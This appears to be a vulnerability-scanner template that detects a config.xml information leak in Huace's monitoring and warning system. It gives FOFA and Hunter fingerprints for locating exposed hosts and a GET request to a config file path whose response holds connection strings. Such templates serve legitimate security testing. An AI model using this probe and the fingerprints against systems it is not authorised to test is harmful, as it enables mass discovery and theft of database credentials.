id: huace-mews-config-xml-infoleak

info:
  name: 华测监测预警系统 config.xml 信息泄露
  author: hufei
  severity: high
  verified: true
  description: |-
    上海华测导航技术股份有限公司的华测监测预警系统可下载任意文件，如web.config文件等。
    FOFA: icon_hash="-628229493"
    HUNTER: web.icon=="be8e2d43a4e9bc5ce43303ce55609199"
  tags: huace,disclosure
  created: 2023/09/21

rules:
  r0:
    request:
      method: GET
      path: /web/Report/Rpt/Config/Config.xml
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'configuration') &&
      response.body.bcontains(b'appSettings') &&
      response.body.bcontains(b'connectionStrings')
expression: r0()